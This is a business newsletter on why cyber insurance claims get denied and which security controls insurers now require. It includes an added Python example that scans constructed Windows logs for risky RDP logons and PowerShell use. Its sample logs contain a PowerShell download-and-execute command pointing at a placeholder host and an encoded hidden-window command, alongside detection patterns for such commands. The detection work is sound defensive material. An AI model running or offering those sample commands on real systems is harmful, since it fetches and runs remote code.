Literally as I was getting ready to write this newsletter, I got a scheduling request from an organization that noted in the request for the meeting – “We fell victim to a phishing scam and lost $177,000”. The heartbreaking part of the conversation was that the organization had a separate cyber liability insurance policy and the insurance carrier is denying the claim.
We continually preach that EVERY organization needs to have a separate cyber liability insurance policy in place. Many of the prospective businesses that we talk to indicate they have a cyber liability rider on their existing general liability policy, and our answer is always the same: that's not enough. The riders almost always have such loose wording that in an actual cyber event you are likely to have the claim denied, so a separate and specific cyber liability policy should be put in place. This organization had the separate policy in place and the claim is still being denied, so what gives?
Having Cyber Liability Insurance Is No Longer A Guarantee Of Protection
Cyber crime has exploded over the last couple of years, and with the increase in state-sponsored attacks the insurance industry is starting to react. That is to be expected: how many claims can a carrier pay out before the losses exceed its risk tolerance for writing a policy at all?
What Can You Do To Provide The Best Chance Of Coverage?
- Absolutely make sure you have a separate cyber liability policy and not just a rider or an addendum to your normal business general liability policy. The addendums or riders simply do not cover the needs and risks of today’s cyber threat landscape.
- Make sure that separate cyber liability policy is through a carrier that is familiar with cyber. Many times this may mean you have to go outside of your existing insurance broker or carrier. If you're not being prompted by your broker/carrier for a separate cyber policy, that should be a red flag. If you ask your broker/carrier and they don't have a practice built around cyber, that should be a red flag. An insurance provider that is truly familiar with how to provide appropriate coverage is going to have a fairly extensive application process; it may seem overwhelming, but it is necessary to make sure you have the appropriate coverage.
- Don’t purchase cyber liability coverage based on the cheapest quote. That’s not to say you shouldn’t shop for options. However, the majority of the time the cheapest policy is also going to be the policy that provides the least amount of coverage and thus increases the potential for a claim to be denied when you need it the most.
Now That You Have Coverage What Are Your Responsibilities As The Insured?
You simply cannot rest on your laurels any longer just because "you have insurance coverage". If you read through your policy, you will most likely find that you have specific responsibilities under it, and those responsibilities are increasing every year. In fact, in some industries or scenarios, you may not be able to obtain coverage unless some of these responsibilities are addressed. We are seeing multiple instances of insurance carriers requiring some of the following items before providing any coverage or renewing an existing policy:
- Multi-factor Authentication (MFA) for email and cloud-based solutions. This is a necessity in today's climate.
- Multi-factor Authentication (MFA) for Windows desktop and systems access. This is a big challenge and not one that can be implemented overnight.
- Security event logging and analysis (SIEM and SOC). This involves having a system in place to collect all security logs, aggregate and retain that data, and having a live person analyzing the results on a continuous basis.
- Advanced endpoint protection (EDR), not just your typical antivirus, but endpoint protection that monitors activity signature-based antivirus does not typically flag as malicious, such as remote desktop connections and PowerShell scripts.
- Incident Response Plan/Platform to ensure the proper steps are identified and a response mapped out BEFORE something bad happens.
- Risk and Vulnerability Assessment: a process to review the technical environment on a scheduled basis and identify risks and liabilities.
- Formal controls that verify the security mechanisms and policies are not only implemented but also being enforced.
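To make the logging-and-analysis and endpoint-monitoring items above concrete, here is an added example (not from the newsletter, and not a product's own detection logic) of the kind of analysis a SOC runs over collected Windows event data. It parses a small set of constructed JSON-lines records, the shape a log shipper might forward to a SIEM, and flags exactly the two activities the list calls out: interactive RDP logons (Security event 4624 with LogonType 10) from outside the internal ranges or after hours, and PowerShell script-block events (4104) containing traits antivirus usually ignores, then correlates the two when they occur for the same user on the same host within a short window. The internal address ranges, business hours, correlation window and all sample records are assumptions chosen for the example.

```python
import json
import re
from datetime import datetime, timedelta

# Constructed sample records (not real logs) in a JSON-lines shape a log
# shipper might forward to a SIEM: Security 4624 logons and PowerShell 4104
# script-block events.
SAMPLE_EVENTS = """
{"ts":"2023-03-01T09:12:00","host":"WS-101","channel":"Security","event_id":4624,"user":"jdoe","logon_type":2,"src_ip":"-"}
{"ts":"2023-03-01T10:05:00","host":"WS-102","channel":"Security","event_id":4624,"user":"asmith","logon_type":10,"src_ip":"10.0.5.20"}
{"ts":"2023-03-01T11:00:00","host":"WS-102","channel":"PowerShell","event_id":4104,"user":"asmith","script":"Get-Process | Sort-Object CPU"}
{"ts":"2023-03-01T23:41:10","host":"FS-01","channel":"Security","event_id":4624,"user":"svc_backup","logon_type":10,"src_ip":"203.0.113.45"}
{"ts":"2023-03-01T23:42:00","host":"FS-01","channel":"PowerShell","event_id":4104,"user":"svc_backup","script":"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"}
{"ts":"2023-03-01T23:43:00","host":"FS-01","channel":"PowerShell","event_id":4104,"user":"svc_backup","script":"powershell -nop -w hidden -enc SQBFAFgAIAAo"}
"""

# Assumptions for this example: the internal address ranges and the hours in
# which interactive logons are expected. Tune both to the environment.
INTERNAL_PREFIXES = ("10.", "192.168.")
BUSINESS_HOURS = range(7, 19)            # 07:00 to 18:59
CORRELATION_WINDOW = timedelta(minutes=15)

# PowerShell traits that signature-based antivirus rarely blocks on their own.
PS_PATTERNS = [
    ("encoded command", re.compile(r"-enc(odedcommand)?\b", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden\b", re.I)),
    ("no profile", re.compile(r"-nop(rofile)?\b", re.I)),
    ("download cradle", re.compile(r"Download(String|File)|Invoke-WebRequest|\biwr\b", re.I)),
    ("invoke-expression", re.compile(r"\bIEX\b|Invoke-Expression", re.I)),
]


def parse_events(text):
    """Parse a JSON-lines export into event dicts with real timestamps."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def check_rdp(ev):
    """4624 with LogonType 10 is an RDP session; flag external or after-hours ones."""
    if ev["event_id"] != 4624 or ev.get("logon_type") != 10:
        return None
    reasons = []
    if not ev["src_ip"].startswith(INTERNAL_PREFIXES):
        reasons.append("RDP from outside internal ranges")
    if ev["ts"].hour not in BUSINESS_HOURS:
        reasons.append("RDP outside business hours")
    if not reasons:
        return None
    return {"rule": "suspicious_rdp", "host": ev["host"], "user": ev["user"],
            "ts": ev["ts"], "reasons": reasons}


def check_powershell(ev):
    """4104 carries the script-block text; flag the traits listed in PS_PATTERNS."""
    if ev["event_id"] != 4104:
        return None
    hits = [label for label, rx in PS_PATTERNS if rx.search(ev["script"])]
    if not hits:
        return None
    return {"rule": "suspicious_powershell", "host": ev["host"], "user": ev["user"],
            "ts": ev["ts"], "reasons": hits}


def analyze(events):
    """Run the per-event checks, then correlate RDP logon -> PowerShell for one host/user."""
    findings = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        for check in (check_rdp, check_powershell):
            finding = check(ev)
            if finding:
                findings.append(finding)
    rdp = [f for f in findings if f["rule"] == "suspicious_rdp"]
    ps = [f for f in findings if f["rule"] == "suspicious_powershell"]
    escalations = []
    for r in rdp:
        for p in ps:
            same_session = (r["host"], r["user"]) == (p["host"], p["user"])
            if same_session and timedelta(0) <= p["ts"] - r["ts"] <= CORRELATION_WINDOW:
                escalations.append({"rule": "rdp_then_powershell", "host": r["host"],
                                    "user": r["user"], "ts": p["ts"],
                                    "reasons": r["reasons"] + p["reasons"]})
    return findings + escalations


if __name__ == "__main__":
    for f in analyze(parse_events(SAMPLE_EVENTS)):
        print(f["ts"], f["rule"], f["host"], f["user"], "; ".join(f["reasons"]))
```

On the constructed input the daytime RDP logon from an internal address and the benign script block produce nothing, while the after-hours external RDP session on FS-01 followed within two minutes by a download cradle and an encoded, hidden-window command is raised both as individual findings and as a correlated escalation. The point of the correlation step is that neither event alone looks like malware to antivirus; it is the sequence, visible only when logs are collected in one place and someone is watching, that tells the story.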
While none of these items by itself provides total assurance of security or of insurance coverage, in combination they give you the best chance of recovering when a cyber event occurs. It's a scary world in the cybersecurity landscape today, especially if you are aware of what is happening on a daily basis, and unfortunately the signs only point to the risk and damage increasing. So the time to act is now: make sure your organization is protected as well as possible and that your insurance coverage is sufficient to cover any needs you may have.